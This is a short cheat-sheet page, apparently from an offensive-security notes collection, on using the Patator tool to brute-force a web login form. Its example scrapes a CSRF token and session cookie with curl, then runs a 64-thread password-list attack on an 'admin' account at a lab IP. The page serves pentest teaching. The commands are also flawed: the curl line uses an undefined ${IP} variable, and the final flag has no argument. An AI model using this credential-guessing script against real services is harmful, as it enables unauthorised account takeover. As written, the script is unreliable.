killchain-compendium/Hashes/Bruteforce/Patator.md

855 B

Patator Bruteforcing

Modules

  • Available modules can be found under patator --help
  • Module specifics can be found via patator <module> -h

Using a Module

  • For example http_fuzz can be used via
TARGET_IP=10.0.47.11
CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}')

echo "The CSRF is: $CSRF"
echo "The PHPSESSID is: $SESSION_ID"

patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x